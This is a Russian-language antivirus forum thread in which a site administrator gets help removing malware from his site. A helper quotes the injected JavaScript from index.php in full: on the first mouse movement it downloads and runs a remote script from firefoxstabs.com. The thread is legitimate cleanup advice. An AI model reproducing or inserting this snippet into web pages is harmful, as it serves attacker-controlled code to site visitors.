Перейти к содержанию
Правила раздела

Вирус на сайте

Mr.kvn

От Mr.kvn
в Помощь в удалении вирусов

 Share

Рекомендуемые сообщения

Mr.kvn Постоялец

Mr.kvn

Опубликовано
Опубликовано

Доброго времени суток!

У меня следующая проблема: я помогаю в администрировании сайта mtt.com.ua. Все было хорошо и вот месяц назад начались проблемы - на многих страницах сайта разные антивирусные системы (в т.ч. и касперский) начали ругаться. Сам сайт я не создавал (там самописная админка и изобретателя найти не представляется возможным). До поры, до времени я не особо нервничал т.к. все вирусы были в java-скриптах, которые я аккуратненько удалял (сделав бэкап) и при этом функционал не менялся (по крайней мере я не видел и жалоб до сих пор не поступало). Но сейчас беда оказалась в index-ном файле категории... Тут уже мириться не представляется возможным.

 

Ссылка проверки на вирусы: virustotal

 

Заранее благодарю за помощь в решении проблеммы.

Сообщение от модератора Mark D. Pearlstone
Файл и потенциально вредоносная ссылка удалены. Если потребуется, хелперы запросят у вас ссылку, которую вы можете им передать через личные сообщения.
Ссылка на комментарий
Поделиться на другие сайты
SLASH_id Гигант мысли

SLASH_id

Опубликовано
Опубликовано

Отредактируйте index.php

Удалите оттуда скрипт в самом конце:

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>document.write('<scr'+'ipt src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});

 

Смените пароли на админку, хостинг и прочие.

Ссылка на комментарий
Поделиться на другие сайты
Mr.kvn Постоялец

Mr.kvn

Опубликовано
  • Автор
Опубликовано

Адрес https://ajax.googleapis.com/ajax/libs/jquer...1/jquery.min.js вроде как безобидный...

 

Дело в том, что этот скрипт предназначается для вставки Google Analytics из админки. Другой вопрос, что на других старницах все норм, а тут... Я абсолютный дуб в java, поэтому не знаю какой фрагмент отсюда вырезать, чтобы функционал остался на месте, а вируса не было...

 

P.s. собственно, где тут вирус? Поясните пожалуйста... просто чтобы на будущее знать.

Ссылка на комментарий
Поделиться на другие сайты
SLASH_id Гигант мысли

SLASH_id

Опубликовано
Опубликовано (изменено)

Отрежьте все после 

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script>

А лучше вырежьте все. А после - вставьте код от Google Analytics

Изменено пользователем SLASH_id
Ссылка на комментарий
Поделиться на другие сайты
Mark D. Pearlstone Мудрец

Mark D. Pearlstone

Опубликовано
Опубликовано
У меня в данный момент не ругается на http://mtt.com.ua/
Аналогично.. все нормально.

На данную ссылку и утром антивирус не ругался, поэтому она была не удалена. Ссылка же с детектом была убрана из первого сообщения.

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • Ser_S
      Проверка сайтов
      От Ser_S
      Здравствуйте, если, например задать маску проверки сайтов например *.mail.ru, то проверяется зона ru, затем mail и затем если звёздочка, то  все эти поддомены соответствуют условию.
      Непонятно, если условие написать mail.*, то будет ли проверяться каждая зона(ru, net, com и т.д.) на содержание поддомена mail?
    • Хасан Абдурахман
      Касперский тормозит открытие сайтов.
      От Хасан Абдурахман
      Открываеш гугл. Кликаеш по ссылке на какой нибудь сайт . И ждешь, пока касперский решит его открыть. Иногда 3-5 минут ждешь. Аж вся душа выматывается.  
    • Vyacheslav_G
      Вирус не удаляется
      От Vyacheslav_G
      CollectionLog-2024.12.25-10.09.zip Точно сказать когда вирус появился не могу,называется chromium:page.malware.url. Проводил сканирование через Dr web,вроде бы вылечил,но при повторном сканировании dr web опять нашел его,и так еще несколько раз. По итогу мне надоело и я переустановил винду,  решил повторно проверить через dr web,он опять нашел его,я опять переустановил винду.Первые несколько программ которые я установил были google,dr web,telegram и steam. Опять делаю проверку на вирусы, и он опять находит его. Как его удалить?
    • Cococanuth
      [РЕШЕНО] Вирус не даёт переустановить виндовс, закрывает все сайты с решениями проблемы, не даёт запуститься антивирусам, закрывает диспетчер задач
      От Cococanuth
      Обнаружилось вчера вечером. Вирус закрывает диспетчер задач (иногда все таки пропускает и он открывается). При поиске в браузерах сайтов с решением проблемы автоматически закрывает их. Закрывает exe-установщики, анитивирусники, автологгеры и подобные программы. Подозреваю о наличии скрытыго пользователя - администратора (некоторые папки с закрытым доступом, некоторые функции недоступны к выполнению). Решение похожей проблемы здесь от 8 мая 2022 не помогло, так как не удаётся установить ни одно приложение (при изменении имени файлов, они не запускаются) 
    • maks_b
      Блокировка сайтов. Веб-контроль.
      От maks_b
      Добрый день.
      Настраиваю блокировку доступа к сайтам, сделал тестовое правило для блокировки доступа к сайту, например к ok.ru. Сайт блокируется все норм, но при включении этого правила перестает соединяться через SSL Network Extender. И любое правило запрета доступа через веб-контроль блокирует соединение через SSL Network Extender. Ошибка на скрине. Если правило отключить, то все работает. Подскажите, как исправить?
      Версия Каспера KES 12.6., KSC тоже последней версии.


×
×
  • Создать...